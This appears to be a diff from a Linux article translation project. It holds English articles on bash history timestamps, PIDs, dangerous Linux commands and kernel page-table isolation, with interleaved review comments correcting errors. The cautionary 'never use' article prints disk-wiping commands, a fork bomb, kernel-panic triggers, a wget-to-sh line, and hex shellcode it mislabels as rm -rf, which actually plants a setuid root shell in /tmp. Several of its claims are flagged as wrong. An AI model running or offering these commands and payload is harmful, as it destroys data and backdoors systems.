[23]://www.cyberciti.biz/faq/reboot-linksys-wag160n-wag54-wag320-wag120n-router-gateway/
|
||||
[24]:/cdn-cgi/l/email-protection
|
||||
[25]://www.cyberciti.biz/tips/wget-resume-broken-download.html
|
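Review bot: every alias definition in the fenced blocks of this file has spaces around the equals sign, for example `alias c = 'clear'` and `alias name =value`, and bash does not read that as a definition; the run-together line after the syntax block shows the intended form `alias name=value`, so the blocks should be restored to that form before translation starts. Smaller points in the same file: the heading number #4 is used twice (calculator and sha1 digest), `--taget` in the backup alias is misspelled next to `--target` in the lines that follow, the nfsrestart alias unmounts `netapp2:` but mounts `natapp2:`, the fastping comment talks about the interval while the alias passes `-s.2` (ping's packet-size option, the interval is `-i`), and the sentence after the ssh config says peer1 where the Host entry is server10. The rebootlinksys alias keeps the router password in ~/.bashrc and sends it to an http:// URL, which deserves a translator's note rather than being carried over silently. The ssh config example is followed by a flattened copy of itself on one line, and reference [24] is defined but never cited.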
@ -0,0 +1,150 @@
|
||||
translating by lujun9972
|
||||
How To Display Date And Time In History Command
|
||||
======
|
||||
We all are familiar with History command. It stores/keep all the commands executed by bash in terminal into `.bash_history` file, which will help us to recheck the previously executed commands by user for further investigation.
|
||||
|
||||
By default history command shows only the commands executed by users and it doesn't print the date and time but it logs the time when you ran a command.
|
||||
|
||||
Whenever you run history command, it looks for an environment variable called `HISTTIMEFORMAT`, which tells how to format date & time with history command.
|
||||
|
||||
If the value is null or not set then it will shows default results like how most of the systems shows (Without date and time).
|
||||
|
||||
HISTTIMEFORMAT takes values from strftime (strftime - convert date and time to a string). When you have date and time in history command output, it might help you to track the issue easily.
|
||||
|
||||
* **%T :** Replaced by the time ( %H : %M : %S ).
|
||||
* **%F :** Equivalent to %Y - %m - %d (the ISO 8601:2000 standard date format).
|
||||
|
||||
|
||||
|
||||
See below default history command output.
|
||||
```
|
||||
# history
|
||||
1 yum install -y mysql-server mysql-client
|
||||
2 service mysqld start
|
||||
3 sysdig proc.name=sshd
|
||||
4 sysdig -c topprocs_net
|
||||
5 sysdig proc.name=sshd
|
||||
6 sysdig proc.name=sshd | more
|
||||
7 sysdig fd.name=/var/log/auth.log | more
|
||||
8 sysdig fd.name=/var/log/mysqld.log
|
||||
9 sysdig -cl
|
||||
10 sysdig -i httplog
|
||||
11 sysdig -i proc_exec_time
|
||||
12 sysdig -i topprocs_cpu
|
||||
13 sysdig -c topprocs_cpu
|
||||
14 sysdig -c tracers_2_statsd
|
||||
15 sysdig -c topfiles_bytes
|
||||
16 sysdig -c topprocs_cpu
|
||||
17 sysdig -c topprocs_cpu "fd.name contains sshd"
|
||||
18 sysdig -c topprocs_cpu "proc.name contains sshd"
|
||||
19 csysdig
|
||||
20 sysdig -c topprocs_cpu
|
||||
21 rpm --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public
|
||||
22 curl -s -o /etc/yum.repos.d/draios.repo http://download.draios.com/stable/rpm/draios.repo
|
||||
23 yum install -y epel-release
|
||||
24 yum update
|
||||
25 yum makecache
|
||||
26 yum -y install kernel-devel-$(uname -r)
|
||||
27 yum -y install sysdig
|
||||
28 sysdig
|
||||
29 yum install httpd mysql
|
||||
30 service httpd start
|
||||
|
||||
```
|
||||
|
||||
We can set this environment variable in three ways based on our requirements.
|
||||
|
||||
* Temporarily to current user
|
||||
* Permanently to current/other user
|
||||
* Permanently to all users
|
||||
|
||||
|
||||
|
||||
**Note :** Don 't forget to add space before the last single-quotes, otherwise the output would be messy.
|
||||
|
||||
### Method-1 :
|
||||
|
||||
Run the following command to set HISTTIMEFORMAT variable temporarily to current user. This will go away after reboot.
|
||||
```
|
||||
# export HISTTIMEFORMAT='%F %T '
|
||||
|
||||
```
|
||||
|
||||
### Method-2 :
|
||||
|
||||
Append following HISTTIMEFORMAT variable to `.bashrc` or `.bash_profile` file to make it permanent for every user.
|
||||
```
|
||||
# echo 'HISTTIMEFORMAT="%F %T "' >> ~/.bashrc
|
||||
or
|
||||
# echo 'HISTTIMEFORMAT="%F %T "' >> ~/.bash_profile
|
||||
|
||||
```
|
||||
|
||||
Run the following command to to effect the changes made to the file.
|
||||
```
|
||||
# source ~/.bashrc
|
||||
or
|
||||
# source ~/.bash_profile
|
||||
|
||||
```
|
||||
|
||||
### Method-3 :
|
||||
|
||||
Append following HISTTIMEFORMAT variable to `/etc/profile` file to make it permanent to all users.
|
||||
```
|
||||
# echo 'HISTTIMEFORMAT="%F %T "' >> /etc/profile
|
||||
|
||||
```
|
||||
|
||||
Run the following command to to effect the changes made to the file.
|
||||
```
|
||||
# source /etc/profile
|
||||
|
||||
```
|
||||
|
||||
See the sample output.
|
||||
```
|
||||
# history
|
||||
1 2017-08-16 15:30:15 yum install -y mysql-server mysql-client
|
||||
2 2017-08-16 15:30:15 service mysqld start
|
||||
3 2017-08-16 15:30:15 sysdig proc.name=sshd
|
||||
4 2017-08-16 15:30:15 sysdig -c topprocs_net
|
||||
5 2017-08-16 15:30:15 sysdig proc.name=sshd
|
||||
6 2017-08-16 15:30:15 sysdig proc.name=sshd | more
|
||||
7 2017-08-16 15:30:15 sysdig fd.name=/var/log/auth.log | more
|
||||
8 2017-08-16 15:30:15 sysdig fd.name=/var/log/mysqld.log
|
||||
9 2017-08-16 15:30:15 sysdig -cl
|
||||
10 2017-08-16 15:30:15 sysdig -i httplog
|
||||
11 2017-08-16 15:30:15 sysdig -i proc_exec_time
|
||||
12 2017-08-16 15:30:15 sysdig -i topprocs_cpu
|
||||
13 2017-08-16 15:30:15 sysdig -c topprocs_cpu
|
||||
14 2017-08-16 15:30:15 sysdig -c tracers_2_statsd
|
||||
15 2017-08-16 15:30:15 sysdig -c topfiles_bytes
|
||||
16 2017-08-16 15:30:15 sysdig -c topprocs_cpu
|
||||
17 2017-08-16 15:30:15 sysdig -c topprocs_cpu "fd.name contains sshd"
|
||||
18 2017-08-16 15:30:15 sysdig -c topprocs_cpu "proc.name contains sshd"
|
||||
19 2017-08-16 15:30:15 csysdig
|
||||
20 2017-08-16 15:30:15 sysdig -c topprocs_cpu
|
||||
21 2017-08-16 15:30:15 rpm --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public
|
||||
22 2017-08-16 15:30:15 curl -s -o /etc/yum.repos.d/draios.repo http://download.draios.com/stable/rpm/draios.repo
|
||||
23 2017-08-16 15:30:15 yum install -y epel-release
|
||||
24 2017-08-16 15:30:15 yum update
|
||||
25 2017-08-16 15:30:15 yum makecache
|
||||
26 2017-08-16 15:30:15 yum -y install kernel-devel-$(uname -r)
|
||||
27 2017-08-16 15:30:15 yum -y install sysdig
|
||||
28 2017-08-16 15:30:15 sysdig
|
||||
29 2017-08-16 15:30:15 yum install httpd mysql
|
||||
30 2017-08-16 15:30:15 service httpd start
|
||||
|
||||
```
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/display-date-time-linux-bash-history-command/
|
||||
|
||||
作者:[2daygeek][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/2daygeek/
|
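Review bot: Method-2 says appending to `~/.bashrc` or `~/.bash_profile` makes the setting "permanent for every user", but both files belong to the account that runs the command, so only that user is affected. The system-wide case is the `/etc/profile` edit in Method-3, and the Method-2 sentence should read "for the current user". The sample output shows the same `2017-08-16 15:30:15` stamp on all 30 entries, which is what bash prints for entries that were saved to the history file without a timestamp (they all get the time the file was loaded). A one-line remark saying so would keep readers from concluding the setting does not work. "to to effect" appears twice and can be fixed in the same pass.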
@ -1,107 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
4 Easiest Ways To Find Out Process ID (PID) In Linux
|
||||
======
|
||||
Everybody knows about PID, Exactly what is PID? Why you want PID? What are you going to do using PID? Are you having the same questions on your mind? If so, you are in the right place to get all the details.
|
||||
|
||||
Mainly, we are looking PID to kill an unresponsive program and it's similar to Windows task manager. Linux GUI also offering the same feature but CLI is an efficient way to perform the kill operation.
|
||||
|
||||
### What Is Process ID?
|
||||
|
||||
PID stands for process identification number which is generally used by most operating system kernels such as Linux, Unix, macOS and Windows. It is a unique identification number that is automatically assigned to each process when it is created in an operating system. A process is a running instance of a program.
|
||||
|
||||
**Suggested Read :** [How To Check Apache Web Server Uptime In Linux][1]
|
||||
|
||||
Each time process ID will be getting change to all the processes except init because init is always the first process on the system and is the ancestor of all other processes. It's PID is 1.
|
||||
|
||||
The default maximum value of PIDs is `32,768`. The same has been verified by running the following command on your system `cat /proc/sys/kernel/pid_max`. On 32-bit systems 32768 is the maximum value but we can set to any value up to 2^22 (approximately 4 million) on 64-bit systems.
|
||||
|
||||
You may ask, why we need such amount of PIDs? because we can't reused the PIDs immediately that's why. Also in order to prevent possible errors.
|
||||
|
||||
The PIDs for the running processes on the system can be found by using the pidof command, pgrep command, ps command, and pstree command.
|
||||
|
||||
### Method-1 : Using pidof Command
|
||||
|
||||
pidof used to find the process ID of a running program. It's prints those id's on the standard output. To demonstrate this, we are going to find out the Apache2 process id from Debian 9 (stretch) system.
|
||||
```
|
||||
# pidof apache2
|
||||
3754 2594 2365 2364 2363 2362 2361
|
||||
|
||||
```
|
||||
|
||||
From the above output you may face difficulties to identify the Process ID because it's shows all the PIDs (included Parent and Childs) aginst the process name. Hence we need to find out the parent PID (PPID), which is the one we are looking. It could be the first number. In my case it's `3754` and it's shorted in descending order.
|
||||
|
||||
### Method-2 : Using pgrep Command
|
||||
|
||||
pgrep looks through the currently running processes and lists the process IDs which match the selection criteria to stdout.
|
||||
```
|
||||
# pgrep apache2
|
||||
2361
|
||||
2362
|
||||
2363
|
||||
2364
|
||||
2365
|
||||
2594
|
||||
3754
|
||||
|
||||
```
|
||||
|
||||
This also similar to the above output but it's shorting the results in ascending order, which clearly says that the parent PID is the last one. In my case it's `3754`.
|
||||
|
||||
**Note :** If you have more than one process id of the process, you may face trouble to identify the parent process id when using pidof & pgrep command.
|
||||
|
||||
### Method-3 : Using pstree Command
|
||||
|
||||
pstree shows running processes as a tree. The tree is rooted at either pid or init if pid is omitted. If a user name is specified in the pstree command then it's shows all the process owned by the corresponding user.
|
||||
|
||||
pstree visually merges identical branches by putting them in square brackets and prefixing them with the repetition count.
|
||||
```
|
||||
# pstree -p | grep "apache2"
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
| |-apache2(2362)
|
||||
| |-apache2(2363)
|
||||
| |-apache2(2364)
|
||||
| |-apache2(2365)
|
||||
| `-apache2(2594)
|
||||
|
||||
```
|
||||
|
||||
To get parent process alone, use the following format.
|
||||
```
|
||||
# pstree -p | grep "apache2" | head -1
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
|
||||
```
|
||||
|
||||
pstree command is very simple because it's segregating the Parent and Child processes separately but it's not easy when using pidof & pgrep command.
|
||||
|
||||
### Method-4 : Using ps Command
|
||||
|
||||
ps displays information about a selection of the active processes. It displays the process ID (pid=PID), the terminal associated with the process (tname=TTY), the cumulated CPU time in [DD-]hh:mm:ss format (time=TIME), and the executable name (ucmd=CMD). Output is unsorted by default.
|
||||
```
|
||||
# ps aux | grep "apache2"
|
||||
www-data 2361 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2362 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2363 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2364 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2365 0.0 0.4 302652 8400 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2594 0.0 0.4 302652 8400 ? S 06:55 0:00 /usr/sbin/apache2 -k start
|
||||
root 3754 0.0 1.4 302580 29324 ? Ss Dec11 0:23 /usr/sbin/apache2 -k start
|
||||
root 5648 0.0 0.0 12784 940 pts/0 S+ 21:32 0:00 grep apache2
|
||||
|
||||
```
|
||||
|
||||
From the above output we can easily identify the parent process id (PPID) based on the process start date. In my case apache2 process was started @ `Dec11` which is the parent and others are child's. PID of apache2 is `3754`.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/how-to-check-find-the-process-id-pid-ppid-of-a-running-program-in-linux/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/magesh/
|
||||
[1]:https://www.2daygeek.com/check-find-apache-httpd-web-server-uptime-linux/
|
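Review bot: the Method-1 and Method-2 paragraphs pick the parent apache2 process by its position in the `pidof` and `pgrep` output ("It could be the first number", "the parent PID is the last one"). That only reflects PID allocation order and stops holding once a worker is respawned or PIDs wrap. The text also uses "PPID" for the parent's own PID, while PPID is the field each child carries. Since this hunk removes the source (`+0,0`), the translated copy is the place to fix it. A translator's note pointing at `ps -o pid,ppid,cmd -C apache2`, where the children's PPID column names the parent directly, would do. The removed file still has the `译者ID` and `校对者ID` placeholders, so check that the replacement fills in the translator.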
@ -1,185 +0,0 @@
|
||||
translating by CYLeft
|
||||
|
||||
The Linux commands you should NEVER use
|
||||
======
|
||||
Unless, of course, you like killing your machines.
|
||||
|
||||
Spider-Man's credo is, "With great power comes great responsibility." That's also a wise attitude for Linux system administrators to adopt.
|
||||
|
||||
No! Really! Thanks to DevOps and cloud orchestration, a Linux admin can control not merely a single server, but tens of thousands of server instances. With one stupid move--like [not patching Apache Struts][1]--you can wreck a multibillion-dollar enterprise.
|
||||
|
||||
Failing to stay on top of security patches is a strategic business problem that goes way above the pay grade of a system administrator. But there are many simple ways to blow up Linux servers, which do lie in the hands of sysadmins. It would be nice to imagine that only newbies make these mistakes--but we know better.
|
||||
|
||||
Here are infamous commands that enable anyone with root access to wreak havoc.
|
||||
|
||||
A word of caution: Never, ever run any of these on a production system. They will harm your system. Don't try this at home! Don't try it at the office, either.
|
||||
|
||||
That said, onward!
|
||||
|
||||
### rm -rf /
|
||||
|
||||
Want to ruin a Linux system in no time flat? You can't beat this classic "worst command ever." It deletes everything--and I mean everything--from your system.
|
||||
|
||||
Like most of these [Linux commands][2], the core program, `rm`, is very handy. It enables you to delete even the most stubborn files. But you're in deep trouble when you combine `rm` with those two flags: `-r`, which forces recursive deletion through all subdirectories, and `-f`, which forces deletion of read-only files without confirmation. If you run it from the / root directory, you'll wipe every last bit of data on your entire drive.
|
||||
|
||||
Just imagine trying to explain that to the boss!
|
||||
|
||||
Now, you might think, "I could never make such a dumb mistake." Oh, my friend, pride goes before a fall. Consider [this cautionary tale from a sysadmin on Reddit][3]:
|
||||
|
||||
> I've been in IT a long time, but today, in Linux, as root, I `rm -r` the wrong path.
|
||||
>
|
||||
> Long story short, I had to copy a bunch of dirs from one path to another and, as you do, I did a couple of `cp -R` to copy the needed about.
|
||||
>
|
||||
> In my wisdom, I tapped the up arrow a couple of times as the dirs to copy are similarly named but they're in amongst a whole bunch of other stuff.
|
||||
>
|
||||
> Anyway, I tapped too far and being distracted as I typed on Skype and Slack and WhatsApp web as well as taking a call from Sage, my brained auto-piloted in: `rm -R ./videodir/* ../companyvideodirwith651vidsin/`
|
||||
|
||||
And there went corporate video file after file into the void. Fortunately, after much frantic pounding of `control-C`, the sysadmin managed to stop the command before it deleted too many files. But let this be a warning to you: Anyone can make this mistake.
|
||||
|
||||
True, most modern systems warn you in great big letters before you make this blunder. However, if you are busy or distracted as you pound away on the keyboard, you can type your system into a black hole.
|
||||
|
||||
There are sneakier ways to get rm -rf. Consider the code below:
|
||||
|
||||
`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
|
||||
|
||||
`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
|
||||
|
||||
`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
|
||||
|
||||
`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
|
||||
|
||||
`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
|
||||
|
||||
`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
|
||||
|
||||
`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
|
||||
|
||||
`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
|
||||
|
||||
`/tmp/.beyond;";`
|
||||
|
||||
What is it? It's the hex version of `rm -rf`. Don't run any command unless you know what it is.
|
||||
|
||||
### Bash fork bomb
|
||||
|
||||
Since we are on the topic of odd-looking code, consider this line:
|
||||
```
|
||||
:(){ :|: & };:
|
||||
```
|
||||
|
||||
It may look cryptic to you, but to me, it looks like the infamous [Bash fork bomb][4]. All it does is start new Bash shells, over and over again, until all your system resources are consumed and the system crashes.
|
||||
|
||||
An up-to-date Linux system shouldn't do this. Note, I said shouldn't. I didn't say won't. Properly set up, Linux systems block this behavior from causing too much harm by setting user limits. Usually, users are restricted to allocate only the memory that the machine has available. But if you run the above (or some other [Bash fork bomb variants][5]) as root, you can still knock a server off until it's rebooted.
|
||||
|
||||
### Overwriting the hard drive with garbage
|
||||
|
||||
There are times you want to zap the data from a disk, but for that job, you should use a tool such as [Darik's Boot and Nuke (DBAN)][6].
|
||||
|
||||
But for just making a royal mess of your storage, it's hard to beat running:
|
||||
```
|
||||
Any command > /dev/hda
|
||||
```
|
||||
|
||||
When I say "any command," I mean any command with output. For example:
|
||||
```
|
||||
ls -la > /dev/hda
|
||||
```
|
||||
|
||||
…pipes the directory listing to your main storage device. Given time, and root privileges, this overwrites all the data on your drive. That's always a good way to start the day in a blind panic--or turn it into a [career-limiting crisis][7].
|
||||
|
||||
### Wipe that drive!
|
||||
|
||||
Another all-time favorite way to smoke storage is to run:
|
||||
```
|
||||
dd if=/dev/zero of=/dev/hda
|
||||
```
|
||||
|
||||
With this command, you're writing data to a drive. The `dd` command pulls its data from the special file, which outputs an infinity of zeros, and pours those zeros all over the hard drive.
|
||||
|
||||
Now /dev/zero may sound like a really silly idea, but it has real uses. For example, you can use it to [clear unused space in a partition with zeros][8]. This makes compressing an image of the partition much smaller for data transfer or archival uses.
|
||||
|
||||
On the other hand, its close relative, `dd if=/dev/random of=/dev/hda`, isn't good for much except ruining your day. If you ran this command (please don't), you would cover your storage with random crap. As a half-assed way to hide your secret plans to take over the office coffee machine, it's not bad, but DBAN is a better tool for that job.
|
||||
|
||||
### /dev/null for the loss
|
||||
|
||||
Perhaps it's because our data is precious to us and our confidence in backups is minimal, but many of these "Never do this!" Linux commands have the result of wiping a hard disk or other storage repository. Case in point: Another pair of ways to ruin your storage is to run `mv / /dev/null` or `>mv ` /dev/null`.
|
||||
|
||||
In the former case, you as the root user are sending all the drive's data into the ever-hungry maw of `/dev/null`. In the latter, you're just feeding your home directory into the same vault of emptiness. In either case, short of restoring from a backup, you won't be seeing any of that data ever again.
|
||||
|
||||
When it comes to containers, don't forget data persistence or data storage. 451 Research offers advice.
|
||||
|
||||
[Get the report][9]
|
||||
|
||||
Heck, accounting didn't really need up-to-date receivables files anyway, did they?
|
||||
|
||||
### Formatting the wrong drive
|
||||
|
||||
Sometimes you must format a drive with a command like:
|
||||
```
|
||||
mkfs.ext3 /dev/hda
|
||||
```
|
||||
|
||||
…which formats the primary hard drive with the ext3 file system. But, wait one darn second! What are you doing formatting your main drive! Aren't you using it?
|
||||
|
||||
Make doubly sure when you're formatting drives--be they solid state, flash, or good old ferrous oxide--that you're formatting the partition that really needs it and not one that's already in use.
|
||||
|
||||
### Kernel panics
|
||||
|
||||
Some Linux commands do not put your machine down for the long count. However, a variety of them can cause the kernel to panic. Normally, these failures are caused by hardware issues, but you can do it to yourself.
|
||||
|
||||
When you encounter a kernel panic, you need to reboot the system to get back to work. In some cases, that's a mild annoyance; in others--such as a production system under heavy load--it's a big deal. Examples include:
|
||||
```
|
||||
dd if=/dev/random of=/dev/port
|
||||
|
||||
echo 1 > /proc/sys/kernel/panic
|
||||
|
||||
cat /dev/port
|
||||
|
||||
cat /dev/zero > /dev/mem
|
||||
```
|
||||
|
||||
All of these cause kernel panics.
|
||||
|
||||
Never run a command unless you know what it's supposed to do, which reminds me…
|
||||
|
||||
### Be wary of unknown scripts
|
||||
|
||||
Young or lazy sysadmins like to borrow scripts written by other people. Why reinvent the wheel, right? So, they find a cool script that promises to automate and check all backups. They grab it with a command such as:
|
||||
```
|
||||
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
|
||||
```
|
||||
|
||||
This downloads the script and then shoots it over to the shell to run. No fuss, no muss, right? Wrong. That script may be poisoned with malware. Sure, Linux is safer than most operating systems by default, but if you run unknown code as root, anything can happen. The danger is not only in maliciousness; the script author's stupidity is equally as harmful. You can be bitten by someone else's undebugged code--because you didn't take the time to even read it through.
|
||||
|
||||
You'd never do something like that? Tell me, all those [container images you're running on Docker][10]? Do you know what they're really running? I know too many sysadmins who run containers without verifying what's really in them. Don't be like them.
|
||||
|
||||
### Shutdown
|
||||
|
||||
The moral of these stories is simple. With Linux, you get an enormous amount of control over your system. You can make your servers do almost anything. But you must make certain that you use that power conscientiously. If you don't, you can wreck not just your servers, but your job and your company. Be like Spider-Man, and use your power responsibly.
|
||||
|
||||
Did I miss any? Tweet me at [@sjvn][11] and [@enterprisenxt][12] to tell me which Linux commands are on your "[Never use this!][13]" list.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
|
||||
|
||||
作者:[Steven Vaughan-Nichols][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html
|
||||
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
|
||||
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
|
||||
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
|
||||
[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
|
||||
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
|
||||
[6]:https://dban.org/
|
||||
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
|
||||
[8]:https://unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4
|
||||
[9]:https://www.hpe.com/us/en/resources/solutions/enterprise-devops-containers.html?jumpid=in_insights~510287587~451_containers~badLinux
|
||||
[10]:https://www.oreilly.com/ideas/five-security-concerns-when-using-docker
|
||||
[11]:http://www.twitter.com/sjvn
|
||||
[12]:http://www.twitter.com/enterprisenxt
|
||||
[13]:https://www.youtube.com/watch?v=v79fYnuVzdI
|
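Review bot: in the "Kernel panics" block, `echo 1 > /proc/sys/kernel/panic` is listed under "All of these cause kernel panics", but that sysctl only sets how many seconds the kernel waits before rebooting after a panic; writing 1 to it does not trigger one. The translation should drop the line or correct the claim. In "/dev/null for the loss" the second command is garbled as `>mv ` /dev/null` with unbalanced backticks, and the next paragraph ("feeding your home directory") shows it was meant to be the home-directory form of the first command. The "451 Research" sentence and "[Get the report][9]" in the same section are an embedded promotion, not article text, and should not be carried into the translated file.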
@ -1,54 +0,0 @@
|
||||
Translating by qhwdw The current state of kernel page-table isolation
|
||||
============================================================
|
||||
|
||||
At the end of October, the [KAISER][8] patch set was unveiled; this work separates the page tables used by the kernel from those belonging to user space in an attempt to address x86 processor bugs that can disclose the layout of the kernel to an attacker. Those patches have seen significant work in the weeks since their debut, but they appear to be approaching a final state. It seems like an appropriate time for another look.
|
||||
|
||||
This work has since been renamed to "kernel page-table isolation" or KPTI, but the objective remains the same: split the page tables, which are currently shared between user and kernel space, into two sets of tables, one for each side. This is a fundamental change to how the kernel's memory management works and is the sort of thing that one would ordinarily expect to see debated for years, especially given its associated performance impact. KPTI remains on the fast track, though. [A set of preparatory patches][2] was merged into the mainline after the 4.15-rc4 release — when only important fixes would ordinarily be allowed — and the rest seems destined for the 4.16 merge window. Many of the core kernel developers have clearly put a lot of time into this work, and Linus Torvalds is [expecting][3] it to be backported to the long-term stable kernels.
|
||||
|
||||
KPTI, in other words, has all the markings of a security patch being readied under pressure from a deadline. Just in case there are any smug ARM-based readers out there, it's worth noting that there is [an equivalent patch set for arm64][4] in the works.
|
||||
|
||||
#### 51 Patches and counting
|
||||
|
||||
As of this writing, the x86 patch series is at [version 163][5]. It contains 51 patches, so we can all be grateful that most of the intervening versions were not posted publicly. The initial patch set, posted by Dave Hansen, has been extensively reworked by Thomas Gleixner, Peter Zijlstra, Andy Lutomirski, and Hugh Dickins, with suggestions from many others. Any bugs that remain in this work won't be there as the result of a lack of experienced eyeballs on the code.
|
||||
|
||||
Page tables on contemporary systems are organized in a tree-like structure that makes for efficient storage of a sparse memory map and supports the huge pages feature; see [this 2005 article][6] for more details and a diagram of how it works. On a system with four levels of page tables (most largish systems, these days), the top level is the page global directory (PGD). Below that come the page upper directory (PUD), page middle directory (PMD), and page-table entries (PTE). Systems with five-level page tables insert a level (called the P4D) just below the PGD.
|
||||
|
||||
Page-fault resolution normally traverses this entire tree to find the PTE of interest, but huge pages can be represented by special entries at the higher levels. For example, a 2MB chunk of memory could be represented by either a single huge-page entry at the PMD level or a full page of single-page PTE entries.
|
||||
|
||||
In current kernels, each process has a single PGD; one of the first steps taken in the KPTI patch series is to create a second PGD. The original remains in use when the kernel is running; it maps the full address space. The second is made active (at the end of the patch series) when the process is running in user space. It points to the same directory hierarchy for pages belonging to the process itself, but the portion describing kernel space (which sits at the high end of the virtual address space) is mostly absent.
|
||||
|
||||
Page-table entries contain permission bits describing how the memory they describe can be accessed; these bits are, naturally, set to prevent user space from accessing kernel pages, even though those pages are mapped into the address space. Unfortunately, a number of hardware-level bugs allow a user-space attacker to determine whether a given kernel-space address is mapped or not, regardless of whether any page mapped at that address is accessible. That information can be used to defeat kernel address-space layout randomization, making life much easier for a local attacker. The core idea behind KPTI is that switching to a PGD lacking a kernel-space mapping will defeat attacks based on these vulnerabilities, of which we have apparently not yet seen the last.
|
||||
|
||||
#### Details
|
||||
|
||||
The idea is simple but, as is so often the case, there are a number of troublesome details that turn a simple idea into a 51-part patch series. The first of those is that, if the processor responds to a hardware interrupt while running in user mode, the kernel code needed to deal with the interrupt will no longer exist in the address space. So there must be enough kernel code mapped in user mode to switch back to the kernel PGD and make the rest available. A similar situation exists for traps, non-maskable interrupts, and system calls. This code is small and can be isolated from the rest, but there are a number of tricky details involved in handling that switch safely and efficiently.
|
||||
|
||||
Another complication comes in the form of the x86 local descriptor table (LDT), which can be used to change how the user-space memory layout looks. It can be tweaked with the little-known [`modify_ldt()`][7] system call. The early POSIX threads implementation on Linux used the LDT to create a thread-local storage area, for example. On current Linux systems, the LDT is almost unused but some applications (Wine, for example) still need it. When it is used, the LDT must be available to both kernel and user space, but it must live in kernel space. The KPTI patch set shuffles kernel memory around to reserve an entire entry at the PGD level for the LDT; the space available for `vmalloc()` calls shrinks to a mere 12,800TB as a result. That allows space for a large number of LDTs, needed on systems with many CPUs. One result of this change is that the location of the LDT is fixed and known to user space — a potential problem, since the ability to overwrite the LDT is easily exploited to compromise the system as a whole. The final patch in the series maps the LDT read-only in an attempt to head off any such attacks.
|
||||
|
||||
Another potential vulnerability comes about if the kernel can ever be manipulated into returning to user space without switching back to the sanitized PGD. Since the kernel-space PGD also maps user-space memory, such an omission could go unnoticed for some time. The response here is to map the user-space portion of the virtual address space as non-executable in the kernel PGD. Should user space ever start running with the wrong page tables, it will immediately crash as a result.
|
||||
|
||||
Finally, while all existing x86 processors are seemingly affected by information-disclosure vulnerabilities, future processors may not be. KPTI comes with a measurable run-time cost, estimated at about 5%. That is a cost that some users may not want to pay, especially once they get newer processors that lack these problems. There will be a `nopti`command-line option to disable this mechanism at boot time. The patch series also adds a new "feature" flag (`X86_BUG_CPU_INSECURE`) to indicate vulnerable CPUs; it is set on all x86 CPUs currently, but might not be on future hardware. In the absence of this feature flag, page-table isolation will automatically be turned off.
|
||||
|
||||
Approximately one month remains before the opening of the 4.16 merge window. During that time, the KPTI patch set will undoubtedly go through a number of additional revisions as the inevitable glitches come to light. Once things settle down, though, it would appear that this code will be merged and backported to stable kernels in a relative hurry. Apparently, we can look forward to slower — but more secure — kernels as a new-year's present.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
|
||||
作者:[Jonathan Corbet ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
|
||||
[1]:https://lwn.net/Promo/slink-trial2-2/claim
|
||||
